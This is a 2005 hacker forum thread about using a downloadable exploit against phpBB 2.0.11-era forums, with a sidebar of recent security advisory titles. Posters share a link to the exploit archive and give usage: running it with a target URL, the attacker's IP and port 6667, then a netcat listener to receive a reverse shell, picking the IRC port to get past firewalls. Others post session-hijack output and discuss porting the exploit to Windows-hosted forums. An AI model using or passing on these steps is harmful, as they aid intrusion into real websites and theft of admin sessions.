 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 475
 Members: 0
 Total: 475
|
|
|
|
|
|
Full disclosure |
|
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 Posted: Tue Mar 22, 2005 2:34 pm |
 |
|
| subzero |
| Valuable expert |
 |
|
| Joined: Mar 16, 2005 |
| Posts: 42 |
|
|
|
 |
|
 |
|
wow wow woow go slow dudes hehe .
check this link murdock http://overdose.tcpteam.org/phpbbexp.rar ;P .serv.h and serv.php inside that .rar
| LINUX wrote: | men all links work nice you need the source code ?
my friends in canada and russia redevelop exploit finish this day and i share Smile dont worry Twisted Evil |
heheh i see nothing since a few days ago.
how to use? fuh
c:> phpbbexpl http://suck.dickies.com 123.456.789.101 6667
open new cmd prompt , make sure u have netcat
c:> nc -lvvp 6667
why use 6667 ? most of them allowed connection to irc port. |
|
|
|
|
| Posted: Tue Mar 22, 2005 7:03 pm |
|
|
| murdock |
| Advanced user |
 |
|
| Joined: Mar 16, 2005 |
| Posts: 54 |
|
|
|
|
|
|
|
Mmmm interesting...
I finally compiled but.....the nc4hk.swf is a netcat compiled executable or not?  |
|
|
|
|
| Posted: Mon Apr 18, 2005 8:58 am |
|
|
| zain |
| Beginner |
 |
|
| Joined: Apr 18, 2005 |
| Posts: 3 |
|
|
|
|
|
|
|
Sorry for resurrecting an old thread, but... I keep getting this error. Trying to run it on a phpBB2 2.0.11 forum.
| Code: | C:\> exp.exe http://www.site.com/phpBB2/ myip 6667
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperΘ ... c47d4770cdcc5bc60707ed4c96487090
http://www.site.com/phpBB2/?sid=c47d4770cdcc5bc60707ed4c96487090
_ recuperation du nom de la table sql ... can't find |
Any idea whats going on? I'm unable to run the UID exploit (the one with the cookie, and the C++ one as well). Those exploits fail on this site as well. |
|
|
|
|
|
|
|
|
| Posted: Mon Apr 18, 2005 6:25 pm |
|
|
| erg0t |
| Valuable expert |
 |
|
| Joined: Apr 08, 2005 |
| Posts: 55 |
| Location: Uruguay |
|
|
|
|
|
|
| zain wrote: | Sorry for resurrecting an old thread, but... I keep getting this error. Trying to run it on a phpBB2 2.0.11 forum.
| Code: | C:\> exp.exe http://www.site.com/phpBB2/ myip 6667
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperΘ ... c47d4770cdcc5bc60707ed4c96487090
http://www.site.com/phpBB2/?sid=c47d4770cdcc5bc60707ed4c96487090
_ recuperation du nom de la table sql ... can't find |
Any idea whats going on? I'm unable to run the UID exploit (the one with the cookie, and the C++ one as well). Those exploits fail on this site as well. |
This means that the forum isn?t vuln. Cause you can send the cookie and then take a sid, but if not work you get a sid anyway (a nomral sid), then to get the name of db you need be admin, cause you take it downloading a backup.
If you are not shure, you can try to exploit only with a cookie with the browser and check if you are admin or not.
Other think, anybody thought in modify the exploit to make it run with windows hosted forums? |
|
|
|
|
|
|
|
|
| Posted: Mon Apr 18, 2005 8:09 pm |
|
|
| zain |
| Beginner |
|
|
| Joined: Apr 18, 2005 |
| Posts: 3 |
|
|
|
|
|
|
|
The website shows that its still running 2.0.11, but none of the <=2.0.12 exploits work on it... Sucks  |
|
|
|
|
| Posted: Fri Jun 17, 2005 3:56 pm |
|
|
| pepeluiso |
| Beginner |
|
|
| Joined: Jun 17, 2005 |
| Posts: 1 |
|
|
|
|
|
|
|
hi, where could i get the phpbbexp.rar to compile it, not with the exe but the source code, the links dosent work.
Thx. |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 2 of 2
Goto page Previous1, 2
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
